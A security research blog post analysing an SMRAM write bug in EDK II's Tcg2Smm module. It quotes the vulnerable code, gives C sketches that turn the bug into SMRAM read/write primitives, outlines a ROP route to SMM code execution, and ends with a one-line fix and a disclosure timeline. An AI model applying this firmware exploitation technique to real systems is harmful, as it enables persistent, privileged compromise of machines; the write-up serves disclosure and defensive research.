For Science! - Using an Unimpressive Bug in EDK II to Do Some Fun Exploitation

Posted Fri 23 June 2023
Author Gwaby
Category Exploitation
Tags UEFI, SMM, vulnerability, 2023

In this blog post we'll see a technique to gain code execution in SMM from a very limited write primitive.

Context

EDK II is the main public implementation of UEFI, on which a large share of manufacturers rely to build their own firmware. It is available on GitHub and supported by the TianoCore community.

A bug was identified in this implementation, more specifically in the Tcg2Smm module. It is due to a lack of validation in an SMM handler, which allows an attacker to write data into SMRAM.

Said like that, it seems quite neat. However, just to kill any expectation the reader may have: this bug is only reachable before the end of the DXE phase. As a matter of fact, the vulnerable handler is unregistered once the EFI_SMM_READY_TO_LOCK_PROTOCOL protocol is published. In other words, it only becomes powerful if chained with another vulnerability, as a way to escalate privileges to SMM during a pre-boot attack.

Considering the git history of the impacted piece of code, it seems this bug was introduced two years ago while separating Tcg2Smm into 2 modules (commit 3c2dc30). This blog post is based on EDK II at commit 02fcfdc (yeah, I procrastinated a bit before publishing it).

Some Recap

You can skip this part and go directly to "The Bug" section if you're already familiar with the UEFI ecosystem.

System Management Mode (SMM)[*] is a special-purpose, privileged operating mode defined in the IA CPU architecture (ring -2). The code running in this mode handles critical resources and is, among other things, partially in charge of protecting the boot process. Data and code used in this mode are located in an isolated memory region called SMRAM, which is protected against access from code running in less privileged modes.

[*]: The actual name is simply "Management Mode" in recent (after 2017 at least) literature. However, as most whitepapers still mention SMM (because they usually date from 2016 or before), it's easier to stick to this designation for now.

Entering SMM is done via a System Management Interrupt (SMI, a.k.a. MMI now), which can be triggered by:

An event signaled on the processor chip SMI# pin;
A write access on a specific I/O port (usually 0xb2).

When an SMI occurs, the processor jumps to a specific vector and the current CPU context is saved. It then switches to a separate operating environment defined by a new address space. SMIs generated synchronously by software (like writing to the I/O port) are commonly called software SMIs or SWSMIs.

Data communication between non-SMM and SMM is performed through:

An ACPI table;
A UEFI protocol named EFI_SMM_COMMUNICATION_PROTOCOL.

The EFI_SMM_COMMUNICATION_PROTOCOL protocol provides routines that enable non-SMM modules to reach SMM handlers that have previously been registered. To do so, the module initializes a communication buffer outside of SMRAM with the GUID identifying the handler it wishes to target and passes it to the EFI_SMM_COMMUNICATION_PROTOCOL.Communicate method. This buffer is then shared with the corresponding SMM handler in SMRAM. The latter returns its response in the same buffer.
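To make the buffer layout more concrete, here is a minimal sketch in plain C, meant to be compiled on a regular host rather than in firmware. The EFI_GUID and EFI_SMM_COMMUNICATE_HEADER types are local stand-ins that mirror the PI specification layout on a 64-bit build, and BuildCommBuffer is a hypothetical helper, not an EDK II function.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Local stand-ins for the UEFI types (64-bit layout assumed). */
typedef struct {
  uint32_t  Data1;
  uint16_t  Data2;
  uint16_t  Data3;
  uint8_t   Data4[8];
} EFI_GUID;

typedef struct {
  EFI_GUID  HeaderGuid;     /* identifies the targeted SMM handler     */
  uint64_t  MessageLength;  /* size of the payload (UINTN in firmware) */
  uint8_t   Data[1];        /* handler-specific payload starts here    */
} EFI_SMM_COMMUNICATE_HEADER;

/*
 * Hypothetical helper: allocate and fill a communication buffer for the
 * handler identified by HandlerGuid. The caller frees the result.
 * Returns NULL if the allocation fails.
 */
static EFI_SMM_COMMUNICATE_HEADER *
BuildCommBuffer (
  const EFI_GUID  *HandlerGuid,
  const void      *Payload,
  size_t          PayloadSize,
  size_t          *TotalSize
  )
{
  const size_t                HeaderSize = offsetof (EFI_SMM_COMMUNICATE_HEADER, Data);
  EFI_SMM_COMMUNICATE_HEADER  *Header;

  assert (HandlerGuid != NULL && Payload != NULL && TotalSize != NULL);

  Header = calloc (1, HeaderSize + PayloadSize);
  if (Header == NULL) {
    return NULL;
  }

  memcpy (&Header->HeaderGuid, HandlerGuid, sizeof (EFI_GUID));
  Header->MessageLength = PayloadSize;
  /* The payload is copied right after the header fields. */
  memcpy ((uint8_t *)Header + HeaderSize, Payload, PayloadSize);

  *TotalSize = HeaderSize + PayloadSize;
  return Header;
}
```

In firmware, the resulting buffer and its total size would then be handed to the Communicate method of the protocol; that call is not modeled here.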

Communication through the ACPI table describes a special type of software SMI that can be used by non-firmware components to reach SMM. Instead of needing a UEFI protocol, the component just reports the SMM communication buffer address in an ACPI table or via general-purpose registers. It then invokes the SWSMI and the corresponding handler is triggered.

The Bug

The Tcg2Smm module is used to implement the TPM 2.0 definition block in an ACPI table. It registers several methods of communication:

two software SMI callback functions (Tcg2PhysicalPresence and MemoryClear) used to handle the requests from the ACPI method;
a handler to communicate the NVS region and SMI channel between SMM and DXE through EFI_SMM_COMMUNICATION_PROTOCOL protocol.

The latter, implemented in Tcg2Smm.c, takes a TPM_NVS_MM_COMM_BUFFER structure as data in the communication buffer. This structure has the following definition:

typedef struct {
  UINT64                  Function;
  UINT64                  ReturnStatus;
  EFI_PHYSICAL_ADDRESS    TargetAddress;
  UINT64                  RegisteredPpSwiValue;
  UINT64                  RegisteredMcSwiValue;
} TPM_NVS_MM_COMM_BUFFER;

While the communication buffer (CommBuffer in the following snippet) is correctly validated to ensure that it is outside of SMRAM, the structure includes an address (TargetAddress) that is directly used, without any checks, to fill the global variable named mTcgNvs.

// Tcg2Smm.c L. 90

EFI_STATUS
EFIAPI
TpmNvsCommunciate (
  IN     EFI_HANDLE  DispatchHandle,
  IN     CONST VOID  *RegisterContext,
  IN OUT VOID        *CommBuffer,
  IN OUT UINTN       *CommBufferSize
  )
{
  EFI_STATUS              Status;
  UINTN                   TempCommBufferSize;
  TPM_NVS_MM_COMM_BUFFER  *CommParams;

  //
  // If input is invalid, stop processing this SMI
  //
  if ((CommBuffer == NULL) || (CommBufferSize == NULL)) {
    return EFI_SUCCESS;
  }

  TempCommBufferSize = *CommBufferSize;

  if (TempCommBufferSize != sizeof (TPM_NVS_MM_COMM_BUFFER)) {
    DEBUG ((DEBUG_ERROR, "[%a] MM Communication buffer size is invalid for this handler!\n", __FUNCTION__));
    return EFI_ACCESS_DENIED;
  }

  if (!IsBufferOutsideMmValid ((UINTN)CommBuffer, TempCommBufferSize)) {
    DEBUG ((DEBUG_ERROR, "[%a] - MM Communication buffer in invalid location!\n", __FUNCTION__));
    return EFI_ACCESS_DENIED;
  }

  //
  // Farm out the job to individual functions based on what was requested.
  //
  CommParams = (TPM_NVS_MM_COMM_BUFFER *)CommBuffer;
  Status     = EFI_SUCCESS;
  switch (CommParams->Function) {
    case TpmNvsMmExchangeInfo:
      DEBUG ((DEBUG_VERBOSE, "[%a] - Function requested: MM_EXCHANGE_NVS_INFO\n", __FUNCTION__));
      CommParams->RegisteredPpSwiValue = mPpSoftwareSmi;
      CommParams->RegisteredMcSwiValue = mMcSoftwareSmi;
      // TargetAddress is attacker-controlled and is stored without any validation.
      mTcgNvs                          = (TCG_NVS *)(UINTN)CommParams->TargetAddress;
      break;
    default:
      DEBUG ((DEBUG_INFO, "[%a] - Unknown function %d!\n", __FUNCTION__, CommParams->Function));
      Status = EFI_UNSUPPORTED;
      break;
  }

  // [...]
}

This global variable holds a pointer to a TCG_NVS structure which is later used to retrieve the NVS region when handling the software SMI. The following snippet shows an example of mTcgNvs manipulation via the Tcg2PhysicalPresence handler:

// Tcg2Smm.c L. 131

EFI_STATUS
EFIAPI
PhysicalPresenceCallback (
  IN EFI_HANDLE  DispatchHandle,
  IN CONST VOID  *Context,
  IN OUT VOID    *CommBuffer,
  IN OUT UINTN   *CommBufferSize
  )
{
  UINT32  MostRecentRequest;
  UINT32  Response;
  UINT32  OperationRequest;
  UINT32  RequestParameter;

  if (mTcgNvs->PhysicalPresence.Parameter == TCG_ACPI_FUNCTION_RETURN_REQUEST_RESPONSE_TO_OS) {
    mTcgNvs->PhysicalPresence.ReturnCode = Tcg2PhysicalPresenceLibReturnOperationResponseToOsFunction (
                                             &MostRecentRequest,
                                             &Response
                                             );
    mTcgNvs->PhysicalPresence.LastRequest = MostRecentRequest;
    mTcgNvs->PhysicalPresence.Response    = Response;
    return EFI_SUCCESS;
  }

  // [...]
}

For the record, the TCG_NVS has the following definition:

#pragma pack(1)
typedef struct {
  PHYSICAL_PRESENCE_NVS    PhysicalPresence;
  MEMORY_CLEAR_NVS         MemoryClear;
  UINT32                   PPRequestUserConfirm;
  UINT32                   TpmIrqNum;
  BOOLEAN                  IsShortFormPkgLength;
} TCG_NVS;

typedef struct {
  UINT8     SoftwareSmi;
  UINT32    Parameter;
  UINT32    Response;
  UINT32    Request;
  UINT32    RequestParameter;
  UINT32    LastRequest;
  UINT32    ReturnCode;
} PHYSICAL_PRESENCE_NVS;

typedef struct {
  UINT8     SoftwareSmi;
  UINT32    Parameter;
  UINT32    Request;
  UINT32    ReturnCode;
} MEMORY_CLEAR_NVS;

Depending on the SMI callback used and the value of the Parameter field in the structure, it is, therefore, possible to arbitrarily write values anywhere in SMRAM. The following list synthesizes the possible outcomes:

PhysicalPresence callback:
- PHYSICAL_PRESENCE_NVS.Parameter == 2:
  - PHYSICAL_PRESENCE_NVS.Request = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000001;
  - Leak several bytes of SMRAM in Tcg2PhysicalPresence nvs variable;
- PHYSICAL_PRESENCE_NVS.Parameter == 5:
  - PHYSICAL_PRESENCE_NVS.Response = 0xXXXXXXXX;
  - PHYSICAL_PRESENCE_NVS.LastRequest = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000000;
- PHYSICAL_PRESENCE_NVS.Parameter == 7:
  - PHYSICAL_PRESENCE_NVS.Request = 0x000000XX;
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000001;
  - Leak several bytes of SMRAM in Tcg2PhysicalPresence nvs variable;
- PHYSICAL_PRESENCE_NVS.Parameter == 8:
  - PHYSICAL_PRESENCE_NVS.ReturnCode = 0x00000000;
MemoryClear callback:
- MEMORY_CLEAR_NVS.Parameter == 1:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000000;
- MEMORY_CLEAR_NVS.Parameter == 2:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000000;
- default value:
  - MEMORY_CLEAR_NVS.ReturnCode = 0x00000001.

Where XX indicates that the value is retrieved from a non-volatile variable (Tcg2PhysicalPresence).

Thus, the easiest manipulation we can gain is writing 0x00000001 to (almost) any arbitrary memory address (i.e. the default case).
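To see which TargetAddress an attacker would send for a given write, the offsets can be derived from the packed structures shown earlier. The following is a rough host-side sketch: the structures are re-declared with standard integer types, TPM_NVS_MM_EXCHANGE_INFO is assumed to be 0, and TargetAddressForWrite and PrepareRequest are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#pragma pack(1)
typedef struct {
  uint8_t   SoftwareSmi;
  uint32_t  Parameter;
  uint32_t  Response;
  uint32_t  Request;
  uint32_t  RequestParameter;
  uint32_t  LastRequest;
  uint32_t  ReturnCode;
} PHYSICAL_PRESENCE_NVS;

typedef struct {
  uint8_t   SoftwareSmi;
  uint32_t  Parameter;
  uint32_t  Request;
  uint32_t  ReturnCode;
} MEMORY_CLEAR_NVS;

typedef struct {
  PHYSICAL_PRESENCE_NVS  PhysicalPresence;
  MEMORY_CLEAR_NVS       MemoryClear;
  uint32_t               PPRequestUserConfirm;
  uint32_t               TpmIrqNum;
  uint8_t                IsShortFormPkgLength;  /* BOOLEAN is one byte */
} TCG_NVS;
#pragma pack()

typedef struct {
  uint64_t  Function;
  uint64_t  ReturnStatus;
  uint64_t  TargetAddress;
  uint64_t  RegisteredPpSwiValue;
  uint64_t  RegisteredMcSwiValue;
} TPM_NVS_MM_COMM_BUFFER;

#define TPM_NVS_MM_EXCHANGE_INFO  0  /* assumed value of TpmNvsMmExchangeInfo */

/* Offset of MemoryClear.ReturnCode from the start of TCG_NVS. */
#define MC_RETURN_CODE_OFFSET \
  (offsetof (TCG_NVS, MemoryClear) + offsetof (MEMORY_CLEAR_NVS, ReturnCode))

/* Value to place in TargetAddress so that ReturnCode lands on WriteAddress. */
static uint64_t
TargetAddressForWrite (uint64_t WriteAddress)
{
  assert (WriteAddress >= MC_RETURN_CODE_OFFSET);
  return WriteAddress - MC_RETURN_CODE_OFFSET;
}

/* Fill the request that makes mTcgNvs point just below the chosen address. */
static void
PrepareRequest (TPM_NVS_MM_COMM_BUFFER *Request, uint64_t WriteAddress)
{
  memset (Request, 0, sizeof (*Request));
  Request->Function      = TPM_NVS_MM_EXCHANGE_INFO;
  Request->TargetAddress = TargetAddressForWrite (WriteAddress);
}
```

This also explains the "(almost)": MemoryClear.Parameter sits 8 bytes below the written dword, and whatever already lives there must be neither 1 nor 2 for the default case to be taken.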

Exploitation

As described in the previous section, the write primitive induced by the manipulation of mTcgNvs is quite limited. This section illustrates a way to transform it into actual code execution. To demonstrate the feasibility of an attack using this bug, we put ourselves in a scenario where we already have code execution in DXE.

4-byte Write Primitive to Arbitrary Read-Write Primitive

Considering the conditions and outcomes that go with the flaw, the easiest manipulation we can gain is a fixed 4-byte write primitive of 0x00000001 anywhere in SMRAM (using the MemoryClear SWSMI callback). It is possible to transform this rather weak primitive into something more powerful by corrupting global variables used in other SMI handlers.

For the sake of the reproducibility of the exploit, we decided to only focus on SMI handlers that are provided "as is" in EDK II. In this context, one module that could be worth corrupting is SmmLockBox.
This module works as a vault and aims at protecting the integrity of the BootScripts used during the S3 resume process by saving their content into SMRAM. It basically provides an SMI handler that allows saving and restoring arbitrary data in SMM.

Note: the LockBox SMI handler is also locked at the end of the DXE phase. However, considering the scenario in which we are (i.e., executing code before EndOfDxe protocol publication), we are not impacted by this limitation. Should we handle this issue, it would simply add an extra step in the exploit chain (changing the value of the mLocked variable to "unlock" the handler). More information about this can be found in the slides I presented at Sthack 2023.

In order to transform the SmmLockBox SMI handler into a proper Read/Write SMRAM primitive, one needs to change the value of the mSmmMemLibInternalSmramCount variable. This variable is used by SmmIsBufferOutsideSmmValid to ensure, among other things, that the provided buffer does not overlap with the SMRAM.

// SmmMemLib.c L. 112

BOOLEAN
EFIAPI
SmmIsBufferOutsideSmmValid (
  IN EFI_PHYSICAL_ADDRESS  Buffer,
  IN UINT64                Length
  )
{
  // [...]

  for (Index = 0; Index < mSmmMemLibInternalSmramCount; Index++) {
    if (((Buffer >= mSmmMemLibInternalSmramRanges[Index].CpuStart) && (Buffer < mSmmMemLibInternalSmramRanges[Index].CpuStart + mSmmMemLibInternalSmramRanges[Index].PhysicalSize)) ||
        ((mSmmMemLibInternalSmramRanges[Index].CpuStart >= Buffer) && (mSmmMemLibInternalSmramRanges[Index].CpuStart < Buffer + Length)))
    {
      DEBUG ((
        DEBUG_ERROR,
        "SmmIsBufferOutsideSmmValid: Overlap: Buffer (0x%lx) - Length (0x%lx), ",
        Buffer,
        Length
        ));
      DEBUG ((
        DEBUG_ERROR,
        "CpuStart (0x%lx) - PhysicalSize (0x%lx)\n",
        mSmmMemLibInternalSmramRanges[Index].CpuStart,
        mSmmMemLibInternalSmramRanges[Index].PhysicalSize
        ));
      return FALSE;
    }
  }
  // [...]
  return TRUE;
}

Since we can write 0x00000001 anywhere, it is possible to misalign the write so that only the upper (zero) bytes of the written value land on the variable, which sets it to 0. The loop over the SMRAM ranges then never runs, so the check that the buffer lies outside SMRAM is effectively skipped.
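The misaligned write is easier to picture on a small byte array. The sketch below is a host-side model, not exploit code: memory is a plain buffer, the counter is assumed to be a 64-bit little-endian value below 256, and all helper names are made up for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value byte by byte in little-endian order, as x86 does. */
static void
Write32Le (uint8_t *Mem, size_t Offset, uint32_t Value)
{
  for (size_t i = 0; i < 4; i++) {
    Mem[Offset + i] = (uint8_t)(Value >> (8 * i));
  }
}

static void
Write64Le (uint8_t *Mem, size_t Offset, uint64_t Value)
{
  for (size_t i = 0; i < 8; i++) {
    Mem[Offset + i] = (uint8_t)(Value >> (8 * i));
  }
}

static uint64_t
Read64Le (const uint8_t *Mem, size_t Offset)
{
  uint64_t Value = 0;

  for (size_t i = 0; i < 8; i++) {
    Value |= (uint64_t)Mem[Offset + i] << (8 * i);
  }

  return Value;
}

/* Model of the bug's primitive: the written value is always 0x00000001. */
static void
FixedWritePrimitive (uint8_t *Mem, size_t Offset)
{
  Write32Le (Mem, Offset, 0x00000001);
}

/*
 * Zero a small counter stored at CounterOffset by starting the write
 * Shift bytes (1 to 3) before it: the 0x01 byte lands in front of the
 * counter and only zero bytes overlap it.
 */
static void
ZeroCounter (uint8_t *Mem, size_t CounterOffset, unsigned Shift)
{
  assert (Shift >= 1 && Shift <= 3 && CounterOffset >= Shift);
  FixedWritePrimitive (Mem, CounterOffset - Shift);
}
```

The price is that up to three bytes located just before the variable are clobbered, so what sits there matters on a real target.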

As a side note, we noticed that in our test environment, the first range referenced in the mSmmMemLibInternalSmramRanges list is 0x7000000 - 0x7001000.

SMRAM ranges dumped from OVMF:

PhysicalStart	CpuStart	PhysicalSize	RegionState
0x7000000	0x7000000	0x001000	`EFI_ALLOCATED` `EFI_CACHEABLE`
0x7001000	0x7001000	0xFFF000	`EFI_CACHEABLE`

Since the data used here are located at higher addresses, we could also simply align the corruption with the address of the variable and set the value to 1 without issue.
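A small model of the loop helps to check both variants (count set to 0, or count set to 1). The sketch below only reproduces the overlap test from the snippet above; the checks elided by "[...]" in the real function are not modeled, the range values are the ones dumped from OVMF, and IsOutsideSmram is a made-up name.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
  uint64_t  CpuStart;
  uint64_t  PhysicalSize;
} SMRAM_RANGE;

/* Ranges observed in the OVMF test environment described above. */
static const SMRAM_RANGE  mRanges[] = {
  { 0x7000000, 0x001000 },
  { 0x7001000, 0xFFF000 },
};

/*
 * Same overlap test as the loop in SmmIsBufferOutsideSmmValid, with the
 * number of ranges passed explicitly so that a corrupted count can be
 * simulated.
 */
static bool
IsOutsideSmram (uint64_t Buffer, uint64_t Length, size_t RangeCount)
{
  assert (RangeCount <= sizeof (mRanges) / sizeof (mRanges[0]));

  for (size_t Index = 0; Index < RangeCount; Index++) {
    uint64_t  Start = mRanges[Index].CpuStart;
    uint64_t  Size  = mRanges[Index].PhysicalSize;

    if (((Buffer >= Start) && (Buffer < Start + Size)) ||
        ((Start >= Buffer) && (Start < Buffer + Length)))
    {
      return false;  /* overlap with an SMRAM range */
    }
  }

  return true;
}
```

With the count forced to 1, only the first 4 KiB range is still checked, which is why an aligned write of 1 is good enough when the interesting data lives in the second range.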

With this check removed, it becomes very straightforward to craft a read/write primitive in SMRAM. The steps are:

Create a LockBox entry with the LockBox command EFI_SMM_LOCK_BOX_COMMAND_SAVE;
In order to read in SMRAM:
- Update the entry with an address in SMRAM (EFI_SMM_LOCK_BOX_COMMAND_UPDATE). This will copy the content into the LockBox buffer;
- Restore the Lockbox with EFI_SMM_LOCK_BOX_COMMAND_RESTORE to retrieve the data.
In order to write in SMRAM:
- Update the entry with a controlled buffer outside of SMRAM (EFI_SMM_LOCK_BOX_COMMAND_UPDATE);
- Send an EFI_SMM_LOCK_BOX_COMMAND_RESTORE request with an address in SMRAM. This will overwrite the data at this address with the content that has been previously sent.
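The steps above can be sketched with a toy model. To be clear, this is not the EDK II LockBox implementation: memory is a flat array whose upper half plays the role of SMRAM, there is a single LockBox, and every name (LockBoxSave, SmramRead, SmramRangeCount, ...) is made up for the illustration. It only shows why save/update/restore turn into read and write primitives once the range check stops firing.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { MEM_SIZE = 0x400, SMRAM_START = 0x200, BOX_ADDR = 0x300, BOX_MAX = 0x40 };

static uint8_t   Mem[MEM_SIZE];        /* [SMRAM_START, MEM_SIZE) is the toy SMRAM  */
static unsigned  SmramRangeCount = 1;  /* stands in for the corrupted range counter */
static size_t    BoxLength;            /* size of the single toy LockBox            */

/* Toy version of the "buffer is outside SMRAM" check. */
static bool
IsOutsideSmram (size_t Addr, size_t Len)
{
  if ((Len > MEM_SIZE) || (Addr > MEM_SIZE - Len)) {
    return false;  /* not inside the toy memory at all */
  }

  for (unsigned i = 0; i < SmramRangeCount; i++) {
    if (Addr + Len > SMRAM_START) {
      return false;
    }
  }

  return true;
}

/* SAVE: copy caller data into the LockBox storage (which lives in SMRAM). */
static bool
LockBoxSave (size_t Buffer, size_t Length)
{
  if ((Length > BOX_MAX) || !IsOutsideSmram (Buffer, Length)) {
    return false;
  }

  memmove (&Mem[BOX_ADDR], &Mem[Buffer], Length);
  BoxLength = Length;
  return true;
}

/* UPDATE: copy caller data into the LockBox at a given offset. */
static bool
LockBoxUpdate (size_t Offset, size_t Buffer, size_t Length)
{
  if ((Offset > BoxLength) || (Length > BoxLength - Offset) || !IsOutsideSmram (Buffer, Length)) {
    return false;
  }

  memmove (&Mem[BOX_ADDR + Offset], &Mem[Buffer], Length);
  return true;
}

/* RESTORE: copy the LockBox content to a caller-supplied address. */
static bool
LockBoxRestore (size_t Buffer, size_t Length)
{
  if ((Length > BoxLength) || !IsOutsideSmram (Buffer, Length)) {
    return false;
  }

  memmove (&Mem[Buffer], &Mem[BOX_ADDR], Length);
  return true;
}

/* Read: UPDATE from an SMRAM address, then RESTORE to a normal buffer. */
static bool
SmramRead (size_t SmramAddr, size_t Scratch, size_t Length)
{
  return LockBoxUpdate (0, SmramAddr, Length) && LockBoxRestore (Scratch, Length);
}

/* Write: UPDATE from a controlled buffer, then RESTORE to an SMRAM address. */
static bool
SmramWrite (size_t SmramAddr, size_t Payload, size_t Length)
{
  return LockBoxUpdate (0, Payload, Length) && LockBoxRestore (SmramAddr, Length);
}
```

While SmramRangeCount is 1, both primitives fail on the first UPDATE or RESTORE that touches the toy SMRAM; once it is 0, they succeed.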

Arbitrary Read-Write Primitive to Code Execution

Once again, we'll leverage the use of the SmmLockBox module for the sake of exploitation. Adding a LockBox entry via EFI_SMM_LOCK_BOX_COMMAND_SAVE provides a handy way to arbitrarily allocate pool buffers in SMRAM. Using this feature, it is possible to send and store a shellcode in SMRAM.

As LockBox entries are linked together in a LIST_ENTRY, finding the location of the buffer can be achieved by retrieving the last entry added to the list head (stored in the global variable mLockBoxQueue).
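As an illustration of the list walk, here is a minimal host-side sketch. LIST_ENTRY, InitializeListHead, InsertTailList and BASE_CR are re-implemented locally after their EDK II namesakes; TOY_LOCK_BOX is a hypothetical record (the real LockBox structure has more fields), and the sketch assumes new entries are appended at the tail, so the newest one is reachable through the head's BackLink.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct _LIST_ENTRY {
  struct _LIST_ENTRY  *ForwardLink;
  struct _LIST_ENTRY  *BackLink;
} LIST_ENTRY;

/* Hypothetical, simplified LockBox record. */
typedef struct {
  uint64_t    Length;
  uint64_t    SmramBuffer;  /* address of the copy stored in SMRAM */
  LIST_ENTRY  Link;
} TOY_LOCK_BOX;

/* Recover the containing record from a pointer to one of its fields. */
#define BASE_CR(Ptr, Type, Field) \
  ((Type *)((uint8_t *)(Ptr) - offsetof (Type, Field)))

static void
InitializeListHead (LIST_ENTRY *Head)
{
  Head->ForwardLink = Head;
  Head->BackLink    = Head;
}

static void
InsertTailList (LIST_ENTRY *Head, LIST_ENTRY *Entry)
{
  Entry->ForwardLink           = Head;
  Entry->BackLink              = Head->BackLink;
  Head->BackLink->ForwardLink  = Entry;
  Head->BackLink               = Entry;
}

/* Newest record under the tail-insertion assumption, or NULL if empty. */
static TOY_LOCK_BOX *
NewestLockBox (LIST_ENTRY *Head)
{
  if (Head->BackLink == Head) {
    return NULL;
  }

  return BASE_CR (Head->BackLink, TOY_LOCK_BOX, Link);
}
```

In an actual exploit the pointers cannot be dereferenced directly from DXE; each hop (list head, link, record fields) would be fetched through the SMRAM read primitive instead.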

The only drawback of this technique is that the buffer is allocated as EfiRuntimeServicesData memory, meaning that the page in which the shellcode is stored is non-executable. The access protection is enforced at the page table level and those tables are write-protected. In addition, if the target uses AMD Secure Encrypted Virtualization (SEV), one needs to retrieve the value that has been used to protect the table entries.

In the end, this issue is rather easy to overcome by crafting a ROP chain modifying the CR0 register, and tweaking the right PTE to respectively remove both the WP and NX bits.
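The bit arithmetic behind those two steps is tiny. As a sketch, assuming the usual x86-64 layout (CR0.WP is bit 16, the NX/XD flag is bit 63 of a page-table entry, and the frame address occupies bits 12 to 51), with made-up helper names and an EncryptionMask parameter standing in for whatever mask the platform applies to table entries:

```c
#include <assert.h>
#include <stdint.h>

#define CR0_WP         (1ULL << 16)           /* CR0 write-protect bit          */
#define PTE_NX         (1ULL << 63)           /* no-execute bit of a table entry */
#define PTE_ADDR_MASK  0x000FFFFFFFFFF000ULL  /* physical frame, bits 12..51     */

/* CR0 value to load so that supervisor writes ignore read-only pages. */
static uint64_t
Cr0WithoutWp (uint64_t Cr0)
{
  return Cr0 & ~CR0_WP;
}

/* Page-table entry with the no-execute bit cleared. */
static uint64_t
PteWithoutNx (uint64_t Pte)
{
  return Pte & ~PTE_NX;
}

/*
 * Physical address referenced by an entry, after stripping a memory
 * encryption mask (0 when no such mask is in use).
 */
static uint64_t
PteFrameAddress (uint64_t Pte, uint64_t EncryptionMask)
{
  return Pte & ~EncryptionMask & PTE_ADDR_MASK;
}
```

In the real chain, the new CR0 value is loaded by a gadget and the patched entry is written back with the write primitive; only the value computation is shown here.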

The actual execution is done by inserting a fake SMI handler in the doubly linked list stored in PiSmmCore.

Side note: The page-level protection is enforced only if the modules are aligned on a page boundary. This should be the case most of the time, except when the developers forget to add the correct build option, as is the case for the MSFT toolchain in the OVMF package. :-^

Remediation

Ultimately, the remediation is straightforward: one simply needs to verify that the structure pointed to by CommParams->TargetAddress does not overlap with SMRAM. The following piece of code illustrates this validation:

// Tcg2Smm.c L. 90

  if (!IsBufferOutsideMmValid (CommParams->TargetAddress, sizeof (TCG_NVS))) {
    return EFI_ACCESS_DENIED;
  }

Conclusion

We discovered a small bug in the public implementation of EDK II that, chained with another flaw, could allow an attacker to gain access to SMM. While the bug is not outstanding in itself, the limited primitive it offers became a nice excuse to play with exploitation techniques for this kind of target.

Even though the remediation is only one line long, the bug was deemed not to be a vulnerability by the community, so no fix is planned for now.

Acknowledgments

Thanks to the colleagues that take time to manage this blog and proofread all the posts. Also, thanks to Ivan for handling the disclosure process. Oh, and thanks to you for reading until the very end (even the acknowledgment, that's cool!). :D

Disclosure timeline

This timeline is not exhaustive and only lists events that we deemed relevant to the disclosure process.

2023-03-14 Quarkslab notified CERT/CC of the vulnerability. Technical report, proof of concept code, and a suggested one line code fix were provided. Case opened in the VINCE portal. The bug is tracked as VU#892082.
2023-03-17 Tianocore opens an issue in the project's bug tracker.
2023-03-23 Tianocore's initial assessment of the bug is that since DXE code already has access to SMM the validity check on the pointer should be done but the bug is not considered a vulnerability.
2023-03-27 Further assessment by Tianocore's engineers agrees that the bug should not be considered a vulnerability.
2023-04-05 Tianocore opens access to the Bugzilla issue and changes its status to Unassigned.
2023-04-07 CERT/CC notified Quarkslab of Tianocore's assessment.
2023-04-14 Quarkslab told CERT/CC that it will review Tianocore's assessment and discuss it internally.
2023-05-10 Quarkslab posted our assessment on the VINCE portal and told CERT/CC that after discussing Tianocore's feedback internally and looking at the source code, we concluded that their assessment is not entirely consistent with the actual code. The assessment concluded that the bug isn't a vulnerability because code in the DXE stage is trusted anyway and can write to SMRAM. However, the actual code does attempt to validate the address of the communication buffer (CommBuffer) by calling the function IsBufferOutsideMmValid(), which indicates that an access check is indeed performed, and the problem is just that a similar call is missing later, before assigning the pointer to the mTcgNvs global variable. Quarkslab nevertheless said that if Tianocore's experts insist on not considering the bug a vulnerability, that assessment will not be contested. It was still suggested to apply the provided one-line fix.
2023-05-12 gwaby describes the bug and the exploitation technique in her talk at the Sthack conference.
2023-06-23 This blog post is published.

